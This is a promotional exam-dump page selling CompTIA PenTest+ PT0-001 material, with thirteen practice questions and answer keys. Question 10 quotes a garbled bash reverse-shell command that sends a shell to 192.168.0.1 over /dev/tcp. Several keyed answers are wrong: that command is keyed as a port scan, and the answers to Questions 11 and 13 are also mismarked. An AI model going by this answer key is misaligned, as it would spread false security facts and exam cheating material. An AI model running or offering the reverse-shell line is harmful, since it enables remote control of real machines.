Latest CompTIA PT0-001 dumps make it easy for you to prepare for exams

How can I prepare for CompTIA PenTest+ PT0-001 exam well? Passexamleader shares the latest and effective CompTIA PT0-001 exam questions and answers, online practice tests, and the most authoritative CompTIA exam experts update PT0-001 exam questions throughout the year. Get the full PT0-001 exam dumps selection: https://www.lead4pass.com/pt0-001.html (145 Q&As). Pass the exam with ease!

CompTIA PenTest+ PT0-001 Exam Video

Table of Contents:

Latest CompTIA PT0-001 google drive

[PDF] Free CompTIA PT0-001 pdf dumps download from Google Drive: https://drive.google.com/open?id=174AtllRzbI_c3ioXliaweHmevjoTd2oT

PenTest+ (Plus) Certification | CompTIA IT Certifications´╝Ühttps://www.comptia.org/certifications/pentest

About the exam

  • CompTIA PenTest+ assesses the most up-to-date penetration testing, and vulnerability assessment and management skills necessary to determine the resiliency of the network against attacks.
  • Successful candidates will have the intermediate skills required to customize assessment frameworks to effectively collaborate on and report findings.
  • Candidates will also have the best practices to communicate recommended strategies to improve the overall state of IT security.

Latest updates CompTIA PT0-001 exam practice questions

QUESTION 1
A penetration tester wants to target NETBIOS name service. Which of the following is the most likely command to
exploit the NETBIOS name service?
A. arPspoof
B. nmap
C. responder
D. burpsuite
Correct Answer: C

QUESTION 2
A penetration tester identifies the following findings during an external vulnerability scan:lead4pass PT0-001 exam question q2

Which of the following attack strategies should be prioritized from the scan results above?
A. Obsolete software may contain exploitable components
B. Weak password management practices may be employed
C. Cryptographically weak protocols may be intercepted
D. Web server configurations may reveal sensitive information
Correct Answer: C

QUESTION 3
A penetration tester notices that the X-Frame-Optjons header on a web application is not set. Which of the following
would a malicious actor do to exploit this configuration setting?
A. Use path modification to escape the application\\’s framework.
B. Create a frame that overlays the application.
C. Inject a malicious iframe containing JavaScript.
D. Pass an iframe attribute that is malicious.
Correct Answer: C

QUESTION 4
Which of the following BEST explains why it is important to maintain confidentiality of any identified findings when
performing a penetration test?
A. Penetration test findings often contain company intellectual property
B. Penetration test findings could lead to consumer dissatisfaction if made pubic
C. Penetration test findings are legal documents containing privileged information
D. Penetration test findings can assist an attacker in compromising a system
Correct Answer: D

QUESTION 5
In which of the following scenarios would a tester perform a Kerberoasting attack?
A. The tester has compromised a Windows device and dumps the LSA secrets.
B. The tester needs to retrieve the SAM database and crack the password hashes.
C. The tester has compromised a limited-privilege user and needs to target other accounts for lateral movement.
D. The tester has compromised an account and needs to dump hashes and plaintext passwords from the system.
Correct Answer: C

QUESTION 6
A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next step the
penetration tester wants to take is to capture all the victim web traffic unencrypted. Which of the following would BEST
meet this goal?
A. Perform an HTTP downgrade attack.
B. Harvest the user credentials to decrypt traffic.
C. Perform an MITM attack.
D. Implement a CA attack by impersonating trusted CAs.
Correct Answer: A

QUESTION 7
A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical
and should be prioritized for exploitation?
A. Stored XSS
B. Fill path disclosure
C. Expired certificate
D. Clickjacking
Correct Answer: A
References https://www.owasp.org/index.php/Top_10_2010-A2-Cross-Site_Scripting_(XSS)

QUESTION 8
Which of the following types of physical security attacks does a mantrap mitigate-?
A. Lock picking
B. Impersonation
C. Shoulder surfing
D. Tailgating
Correct Answer: D

QUESTION 9
When performing compliance-based assessments, which of the following is the MOST important Key consideration?
A. Additional rate
B. Company policy
C. Impact tolerance
D. Industry type
Correct Answer: D

QUESTION 10
The following line was found in an exploited machine\\’s history file. An attacker ran the following command:
bash -i >and /dev/tcp/192.168.0.1/80 0> and1
Which of the following describes what the command does?
A. Performs a port scan.
B. Grabs the web server\\’s banner.
C. Redirects a TTY to a remote system.
D. Removes error logs for the supplied IP.
Correct Answer: A

QUESTION 11
After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a
user\\’s folder titled “changepass” -sr -xr -x 1 root root 6443 Oct 18 2017 /home/user/changepass Using “strings” to print
ASCII printable characters from changepass, the tester notes the following: $ strings changepass Exit setuid strmp
GLINC _2.0 ENV_PATH %s/changepw malloc strlen Given this information, which of the following is the MOST likely
path of exploitation to achieve root privileges on the machines?
A. Copy changepass to a writable directory and export the ENV_PATH environmental variable to the path of a token-
stealing binary titled changepw. Then run changepass
B. Create a copy of changepass in the same directory, naming it changpw. Export the ENV_PATH environmental
variable to the path “/home/user\\’. Then run changepass
C. Export the ENV_PATH environmental variable to the path of a writable directory that contains a token-stealing binary
title changepw
D. Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the
path of `/usr/local/bin\\’
Correct Answer: D

QUESTION 12
During an internal network penetration test, a tester recovers the NTLM password hash tor a user known to have full
administrator privileges on a number of target systems Efforts to crack the hash and recover the plaintext password
have been unsuccessful Which of the following would be the BEST target for continued exploitation efforts?
A. Operating system Windows 7 Open ports: 23, 161
B. Operating system Windows Server 2016 Open ports: 53, 5900
C. Operating system Windows 8 1 Open ports 445, 3389
D. Operating system Windows 8 Open ports 514, 3389
Correct Answer: C

QUESTION 13
An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to
manage power generation and cooling. Which of the following is a consideration unique to such an environment that
must be made by the firm when preparing for the assessment?
A. Selection of the appropriate set of security testing tools
B. Current and load ratings of the ICS components
C. Potential operational and safety hazards
D. Electrical certification of hardware used in the test
Correct Answer: A

Related PT0-001 Popular Exam resources

titlepdf youtube CompTIA lead4pass Lead4Pass Total Questions related CompTIA blog
CompTIA PenTest+ lead4pass PT0-001 dumps pdf lead4pass PT0-001 youtube PenTest+ (Plus) Certification | CompTIA IT Certifications https://www.lead4pass.com/pt0-001.html 145 Q&A Examkraft Comptia pt0-001 exam

Lead4Pass Year-round Discount Code

lead4pass coupon

What are the advantages of Lead4pass?

Lead4pass employs the most authoritative exam specialists from CompTIA, Microsoft, Cisco, Oracle, VMware, etc.
We update exam data throughout the year. Highest pass rate! We have a large user base. We are the industry leader! Choose Lead4Pass to pass the exam with ease!

about lead4pass

Summarize:

It’s not easy to pass the CompTIA PT0-001 exam, but with accurate learning materials and proper practice, you can crack the exam with excellent results. https://www.lead4pass.com/pt0-001.html provides you with the most relevant learning materials that you can use to help you prepare.